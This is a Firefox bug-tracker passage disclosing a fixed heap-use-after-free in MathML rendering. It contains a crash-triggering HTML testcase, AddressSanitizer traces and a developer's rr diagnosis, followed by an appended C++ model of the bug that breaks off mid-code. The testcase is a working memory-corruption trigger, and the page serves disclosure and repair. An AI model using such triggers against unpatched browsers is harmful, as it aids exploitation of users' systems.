Closed Bug 1417010 Opened 7 years ago Closed 7 years ago

heap-use-after-free in nsDisplayMathMLCharForeground::GetBounds

Categories

(Core :: MathML, defect)

59 Branch
defect
Not set
normal

Tracking

VERIFIED FIXED
mozilla59
Tracking Status
firefox-esr52 --- unaffected
firefox57 --- unaffected
firefox58 --- verified
firefox59 --- verified

People

(Reporter: nils, Assigned: mattwoodrow)

References

Details

(4 keywords, Whiteboard: [post-critsmash-triage])

Attachments

(3 files)

The following testcase crashes the latest ASAN build of Firefox 59.0a1 (SourceStamp=e1d7427787f7a26983c92ea1a1ac99eb863edd6c)

crash.html:

<script>
// Synchronous XHR spins the main-thread event loop from inside the timeout
// handler, so a refresh-driver tick (frame construction and paint) runs
// before the handler returns and the retained display items get built.
function spin () {
  var x=new XMLHttpRequest();
  x.open("POST","https://mozilla.org",false);
  try{x.send("X");}catch(e){}
}
function start() {
  window.setTimeout(fun0, 100);
}
function fun0() {
  o274=document.createElementNS('http://www.w3.org/1998/Math/MathML','math');
  o275=document.createElementNS('http://www.w3.org/1998/Math/MathML','mo');
  o274.appendChild(o275);
  o276=document.createElementNS('http://www.w3.org/1998/Math/MathML','mfenced');
  o275.appendChild(o276);
  document.body.appendChild(o274);
  spin();
  // Pick the last element without an id (the mfenced) and change an
  // attribute on it: AttributeChanged deletes and recreates its fence chars.
  o290=function() {let x=document.querySelectorAll('*:not([id])');return x[x.length-1]}();
  o290.id='id3';
}
</script>
<body onload="start()"></body>

ASAN output:

=================================================================
==15101==ERROR: AddressSanitizer: heap-use-after-free on address 0x6110002c0290 at pc 0x7f9c8868cf52 bp 0x7fff74fc05c0 sp 0x7fff74fc05b8
READ of size 4 at 0x6110002c0290 thread T0 (file:// Content)
    #0 0x7f9c8868cf51 in GetRect /builds/worker/workspace/build/src/layout/mathml/nsMathMLChar.h:155:11
    #1 0x7f9c8868cf51 in nsDisplayMathMLCharForeground::GetBounds(nsDisplayListBuilder*, bool*) const /builds/worker/workspace/build/src/layout/mathml/nsMathMLChar.cpp:1885
    #2 0x7f9c88714ef4 in GetClippedBounds /builds/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:3099:14
    #3 0x7f9c88714ef4 in nsDisplayList::GetClippedBoundsWithRespectToASR(nsDisplayListBuilder*, mozilla::ActiveScrolledRoot const*, nsRect*) const /builds/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:2180
    #4 0x7f9c8871085e in mozilla::FrameLayerBuilder::BuildContainerLayerFor(nsDisplayListBuilder*, mozilla::layers::LayerManager*, nsIFrame*, nsDisplayItem*, nsDisplayList*, mozilla::ContainerLayerParameters const&, mozilla::gfx::Matrix4x4Typed<mozilla::gfx::UnknownUnits, mozilla::gfx::UnknownUnits> const*, unsigned int) /builds/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:5623:30
    #5 0x7f9c88798780 in nsDisplayList::PaintRoot(nsDisplayListBuilder*, gfxContext*, unsigned int) /builds/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:2477:9
    #6 0x7f9c87f6a581 in nsLayoutUtils::PaintFrame(gfxContext*, nsIFrame*, nsRegion const&, unsigned int, nsDisplayListBuilderMode, nsLayoutUtils::PaintFrameFlags) /builds/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3916:12
    #7 0x7f9c87e60674 in mozilla::PresShell::Paint(nsView*, nsRegion const&, unsigned int) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:6468:5
    #8 0x7f9c876217f6 in nsViewManager::ProcessPendingUpdatesPaint(nsIWidget*) /builds/worker/workspace/build/src/view/nsViewManager.cpp:480:19
    #9 0x7f9c8762069b in nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) /builds/worker/workspace/build/src/view/nsViewManager.cpp:412:33
    #10 0x7f9c87623ed5 in nsViewManager::ProcessPendingUpdates() /builds/worker/workspace/build/src/view/nsViewManager.cpp:1102:5
    #11 0x7f9c87dbeee3 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2047:11
    #12 0x7f9c87dca41b in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:336:13
    #13 0x7f9c87dca41b in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:306
    #14 0x7f9c87dca116 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:328:5
    #15 0x7f9c87dcc66b in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:769:5
    #16 0x7f9c87dcc66b in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:682
    #17 0x7f9c87dcc276 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:583:9
    #18 0x7f9c88620d72 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /builds/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:68:16
    #19 0x7f9c821819a1 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
    #20 0x7f9c8204cde5 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1815:28
    #21 0x7f9c81ca2269 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2119:25
    #22 0x7f9c81c9f27f in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2049:17
    #23 0x7f9c81ca09b4 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1895:5
    #24 0x7f9c81ca1008 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1928:15
    #25 0x7f9c80edb616 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
    #26 0x7f9c80ef5ad8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
    #27 0x7f9c81ca9ec6 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:125:5
    #28 0x7f9c81c0a6bb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #29 0x7f9c81c0a6bb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #30 0x7f9c81c0a6bb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #31 0x7f9c876a26cf in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:159:27
    #32 0x7f9c8b9d9627 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
    #33 0x7f9c81c0a6bb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #34 0x7f9c81c0a6bb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #35 0x7f9c81c0a6bb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #36 0x7f9c8b9d8fda in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
    #37 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
    #38 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #39 0x7f9c9e6a982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #40 0x41dbc8 in _start (/fuzzer3/firefox/firefox+0x41dbc8)

0x6110002c0290 is located 16 bytes inside of 200-byte region [0x6110002c0280,0x6110002c0348)
freed by thread T0 (file:// Content) here:
    #0 0x4bc0fb in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f9c88661930 in operator delete /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:230:12
    #2 0x7f9c88661930 in nsMathMLmfencedFrame::RemoveFencesAndSeparators() /builds/worker/workspace/build/src/layout/mathml/nsMathMLmfencedFrame.cpp:86
    #3 0x7f9c886631f1 in nsMathMLmfencedFrame::AttributeChanged(int, nsAtom*, int) /builds/worker/workspace/build/src/layout/mathml/nsMathMLmfencedFrame.cpp:67:3
    #4 0x7f9c87e8ad30 in mozilla::ServoRestyleManager::AttributeChanged(mozilla::dom::Element*, int, nsAtom*, int, nsAttrValue const*) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1445:19
    #5 0x7f9c87e4baa4 in AttributeChanged /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:72:3
    #6 0x7f9c87e4baa4 in mozilla::PresShell::AttributeChanged(nsIDocument*, mozilla::dom::Element*, int, nsAtom*, int, nsAttrValue const*) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4381
    #7 0x7f9c83e01b07 in nsNodeUtils::AttributeChanged(mozilla::dom::Element*, int, nsAtom*, int, nsAttrValue const*) /builds/worker/workspace/build/src/dom/base/nsNodeUtils.cpp:146:3
    #8 0x7f9c83ab57b1 in mozilla::dom::Element::SetAttrAndNotify(int, nsAtom*, nsAtom*, nsAttrValue const*, nsAttrValue&, nsIPrincipal*, unsigned char, bool, bool, bool, nsIDocument*, mozAutoDocUpdate const&) /builds/worker/workspace/build/src/dom/base/Element.cpp:2813:5
    #9 0x7f9c83ab71d5 in mozilla::dom::Element::SetAttr(int, nsAtom*, nsAtom*, nsTSubstring<char16_t> const&, nsIPrincipal*, bool) /builds/worker/workspace/build/src/dom/base/Element.cpp:2637:10
    #10 0x7f9c853408d4 in SetAttr /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIContent.h:380:12
    #11 0x7f9c853408d4 in SetAttr /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIContent.h:375
    #12 0x7f9c853408d4 in SetId /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:891
    #13 0x7f9c853408d4 in mozilla::dom::ElementBinding::set_id(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Element*, JSJitSetterCallArgs) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:781
    #14 0x7f9c8584282a in mozilla::dom::GenericBindingSetter(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3001:8
    #15 0x7f9c8bc83a90 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #16 0x7f9c8bc83a90 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #17 0x7f9c8bc861e0 in InternalCall /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:12
    #18 0x7f9c8bc861e0 in Call /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541
    #19 0x7f9c8bc861e0 in js::CallSetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:670
    #20 0x7f9c8cc18399 in SetExistingProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<js::NativeObject*>, JS::Handle<JS::PropertyResult>, JS::ObjectOpResult&) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2729:10
    #21 0x7f9c8cc10cac in bool js::NativeSetProperty<(js::QualifiedBool)1>(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2757:20
    #22 0x7f9c8bc68d14 in SetProperty /builds/worker/workspace/build/src/js/src/vm/NativeObject.h:1633:12
    #23 0x7f9c8bc68d14 in SetPropertyOperation /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:270
    #24 0x7f9c8bc68d14 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2895
    #25 0x7f9c8bc5705a in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #26 0x7f9c8bc83b8f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #27 0x7f9c8bc84a82 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #28 0x7f9c8c6c9ecb in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3032:12
    #29 0x7f9c853b6dc9 in mozilla::dom::Function::Call(JSContext*, JS::Handle<JS::Value>, nsTArray<JS::Value> const&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/FunctionBinding.cpp:36:8
    #30 0x7f9c839e518b in Call<nsCOMPtr<nsISupports> > /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/FunctionBinding.h:72:12
    #31 0x7f9c839e518b in nsGlobalWindow::RunTimeoutHandler(mozilla::dom::Timeout*, nsIScriptContext*) /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13242
    #32 0x7f9c83bc458d in mozilla::dom::TimeoutManager::RunTimeout(mozilla::TimeStamp const&, mozilla::TimeStamp const&) /builds/worker/workspace/build/src/dom/base/TimeoutManager.cpp:878:42
    #33 0x7f9c83bb8550 in mozilla::dom::TimeoutExecutor::MaybeExecute() /builds/worker/workspace/build/src/dom/base/TimeoutExecutor.cpp:171:11
    #34 0x7f9c83bb8da6 in Notify /builds/worker/workspace/build/src/dom/base/TimeoutExecutor.cpp:239:5
    #35 0x7f9c83bb8da6 in non-virtual thunk to mozilla::dom::TimeoutExecutor::Notify(nsITimer*) /builds/worker/workspace/build/src/dom/base/TimeoutExecutor.cpp:234
    #36 0x7f9c80efa950 in nsTimerImpl::Fire(int) /builds/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:704:40
    #37 0x7f9c80ecc8e6 in nsTimerEvent::Run() /builds/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:286:11
    #38 0x7f9c80eeb2a2 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /builds/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:193:22
    #39 0x7f9c80eeae0f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /builds/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:79:15
    #40 0x7f9c80eb5d21 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:396:25
    #41 0x7f9c80edb616 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14

previously allocated by thread T0 (file:// Content) here:
    #0 0x4bc44c in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ed85d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17
    #2 0x7f9c8866222e in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:206:12
    #3 0x7f9c8866222e in nsMathMLmfencedFrame::CreateFencesAndSeparators(nsPresContext*) /builds/worker/workspace/build/src/layout/mathml/nsMathMLmfencedFrame.cpp:110
    #4 0x7f9c88661e8f in nsMathMLmfencedFrame::InheritAutomaticData(nsIFrame*) /builds/worker/workspace/build/src/layout/mathml/nsMathMLmfencedFrame.cpp:40:3
    #5 0x7f9c886630ff in non-virtual thunk to nsMathMLmfencedFrame::InheritAutomaticData(nsIFrame*) /builds/worker/workspace/build/src/layout/mathml/nsMathMLmfencedFrame.cpp:32:23
    #6 0x7f9c88641bd0 in nsMathMLContainerFrame::RebuildAutomaticDataForChildren(nsIFrame*) /builds/worker/workspace/build/src/layout/mathml/nsMathMLContainerFrame.cpp:660:25
    #7 0x7f9c88641bd8 in nsMathMLContainerFrame::RebuildAutomaticDataForChildren(nsIFrame*) /builds/worker/workspace/build/src/layout/mathml/nsMathMLContainerFrame.cpp:662:5
    #8 0x7f9c87edb536 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4245:28
    #9 0x7f9c87ee5b5b in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6384:3
    #10 0x7f9c87ec3ed6 in nsCSSFrameConstructor::ConstructFramesFromItemList(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList&, nsContainerFrame*, bool, nsFrameItems&) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10958:5
    #11 0x7f9c87ef3fbc in nsCSSFrameConstructor::ContentAppended(nsIContent*, nsIContent*, nsCSSFrameConstructor::InsertionKind, TreeMatchContext*) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7811:3
    #12 0x7f9c87e14385 in mozilla::RestyleManager::ProcessRestyledFrames(nsStyleChangeList&) /builds/worker/workspace/build/src/layout/base/RestyleManager.cpp:1414:27
    #13 0x7f9c87e8920a in mozilla::ServoRestyleManager::DoProcessPendingRestyles(mozilla::ServoTraversalFlags) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1159:9
    #14 0x7f9c87e4872f in ProcessPendingRestyles /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1235:3
    #15 0x7f9c87e4872f in ProcessPendingRestyles /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:44
    #16 0x7f9c87e4872f in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4193
    #17 0x7f9c87dbcee8 in FlushPendingNotifications /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:579:5
    #18 0x7f9c87dbcee8 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1882
    #19 0x7f9c87dca41b in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:336:13
    #20 0x7f9c87dca41b in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:306
    #21 0x7f9c87dca116 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:328:5
    #22 0x7f9c87dcc66b in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:769:5
    #23 0x7f9c87dcc66b in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:682
    #24 0x7f9c87dcc276 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:583:9
    #25 0x7f9c88620d72 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /builds/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:68:16
    #26 0x7f9c821819a1 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
    #27 0x7f9c8204cde5 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1815:28
    #28 0x7f9c81ca2269 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2119:25
    #29 0x7f9c81c9f27f in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2049:17
    #30 0x7f9c81ca09b4 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1895:5
    #31 0x7f9c81ca1008 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1928:15
    #32 0x7f9c80edb616 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
    #33 0x7f9c80ef5ad8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
    #34 0x7f9c874ceaa7 in SpinEventLoopUntil<mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3110:31)> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:323:25
    #35 0x7f9c874ceaa7 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3110
    #36 0x7f9c874d0315 in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, mozilla::dom::Nullable<mozilla::dom::DocumentOrBlobOrArrayBufferViewOrArrayBufferOrFormDataOrURLSearchParamsOrUSVString> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2939:11

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/layout/mathml/nsMathMLChar.h:155:11 in GetRect
Shadow bytes around the buggy address:
  0x0c2280050000: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2280050010: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2280050020: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c2280050030: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2280050040: fd fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c2280050050: fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2280050060: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x0c2280050070: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c2280050080: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2280050090: fd fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c22800500a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==15101==ABORTING
Attached file ASAN output
Group: core-security → layout-core-security
Matt, do you know who might be able to investigate this? Thanks.
Flags: needinfo?(matt.woodrow)
I haven't been able to reproduce these crashes with a non-ASAN build yet. Nils, were there any extra prefs that need setting for this?
Flags: needinfo?(nils)
Assignee: nobody → matt.woodrow
Flags: needinfo?(matt.woodrow)
I've looked briefly at this in 'rr'. It appears we access a deleted nsMathMLChar, which was deleted here:

#0 nsMathMLmfencedFrame::RemoveFencesAndSeparators layout/mathml/nsMathMLmfencedFrame.cpp:86
#1 nsMathMLmfencedFrame::AttributeChanged
#2 mozilla::ServoRestyleManager::AttributeChanged
#3 mozilla::RestyleManager::AttributeChanged
#4 mozilla::PresShell::AttributeChanged
#5 non-virtual thunk to mozilla::PresShell::AttributeChanged
#6 nsNodeUtils::AttributeChanged
#7 mozilla::dom::Element::SetAttrAndNotify
#8 mozilla::dom::Element::SetAttr

(rr) list
81      }
82
83      void
84      nsMathMLmfencedFrame::RemoveFencesAndSeparators()
85      {
86        delete mOpenChar;
87        delete mCloseChar;
88        if (mSeparatorsChar) delete[] mSeparatorsChar;
89
90        mOpenChar = nullptr;
(rr) p this->mOpenChar
$29 = (nsMathMLChar *) 0x611000455a00

But apparently we still have a nsDisplayMathMLCharForeground which references it through its mChar member, which is what ASAN caught:

#3 in nsDisplayMathMLCharForeground::GetBounds
1885      mChar->GetRect(rect);
(rr) p this->mChar
$30 = (nsMathMLChar *) 0x611000455a00
Blocks: 1352499
(In reply to Ryan VanderMeulen [:RyanVM] from comment #3)
> I haven't been able to reproduce these crashes with a non-ASAN build yet.
> Nils, were there any extra prefs that need setting for this?

I'm not sure, but this might be needed:

user_pref("browser.rights.3.shown", true);

(it was needed in another bug that used the same sync XHR trick)

The crash in this bug is harder to reproduce though.
MathML display items can have a raw pointer to an nsMathMLChar, and then we delete it. We need to make sure we mark the display items as needing a rebuild before we try to use them again.
Attachment #8929213 - Flags: review?(mikokm)
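The ownership problem Matt describes in the two comments above (an nsDisplayMathMLCharForeground keeping a raw pointer to an nsMathMLChar that nsMathMLmfencedFrame::AttributeChanged deletes and recreates, while a retained display list reuses the item on the next paint) and the invalidation the fix adds, written out as a small stand-alone model. This is an added example, not Firefox code and not the attached patch: MfencedFrame, CharForegroundItem, RetainedDisplayList, the generation counter and the needsItemRebuild flag are hypothetical stand-ins for the real classes and for whatever mechanism the patch uses to mark items for rebuild. Reading through the dangling pointer is undefined behaviour, so the model refuses to dereference a stale item instead of reproducing the crash; in the real build that read is the line ASAN reports.

```cpp
// Model of bug 1417010 (added example, not Firefox code): a retained display
// item holds a raw pointer into an object the frame owns and replaces on
// attribute change. All class names are hypothetical stand-ins.
#include <cstddef>
#include <memory>
#include <vector>

struct Rect {
  int x = 0, y = 0, w = 0, h = 0;
  bool operator==(const Rect& o) const {
    return x == o.x && y == o.y && w == o.w && h == o.h;
  }
};

// Stand-in for nsMathMLChar: a heap object owned by the frame.
struct MathChar {
  Rect rect;
  explicit MathChar(Rect r) : rect(r) {}
  void GetRect(Rect* out) const { *out = rect; }
};

// Stand-in for nsMathMLmfencedFrame. It owns its fence chars and recreates
// them on every attribute change; that delete is the one in the ASAN
// "freed by" stack.
struct MfencedFrame {
  std::unique_ptr<MathChar> openChar;
  std::unique_ptr<MathChar> closeChar;
  unsigned generation = 0;       // bumped whenever the chars are recreated
  bool needsItemRebuild = false; // the flag the fix sets (hypothetical)

  void CreateFencesAndSeparators(int width) {
    openChar = std::make_unique<MathChar>(Rect{0, 0, width, 10});
    closeChar = std::make_unique<MathChar>(Rect{width + 20, 0, width, 10});
    ++generation;
  }
  void RemoveFencesAndSeparators() {
    openChar.reset();   // delete mOpenChar
    closeChar.reset();  // delete mCloseChar
  }
  // fixed=false is the unpatched behaviour: the chars are replaced but the
  // retained display list is never told, so its items keep the old pointers.
  void AttributeChanged(int newWidth, bool fixed) {
    RemoveFencesAndSeparators();
    CreateFencesAndSeparators(newWidth);
    if (fixed) needsItemRebuild = true;  // invalidate items built from this frame
  }
};

// Stand-in for nsDisplayMathMLCharForeground: a raw, non-owning pointer to
// the char, plus (for this model only) the frame generation it was built
// against, so staleness can be detected without touching freed memory.
struct CharForegroundItem {
  MfencedFrame* frame;
  MathChar* mChar;
  unsigned builtGeneration;

  bool IsStale() const { return frame->generation != builtGeneration; }
  // Returns false instead of dereferencing a pointer to a deleted char; in
  // the real code this is the mChar->GetRect(rect) read ASAN flagged.
  bool GetBounds(Rect* out) const {
    if (IsStale()) return false;
    mChar->GetRect(out);
    return true;
  }
};

struct RetainedDisplayList {
  std::vector<CharForegroundItem> items;

  void BuildFor(MfencedFrame& f) {
    items.clear();
    items.push_back({&f, f.openChar.get(), f.generation});
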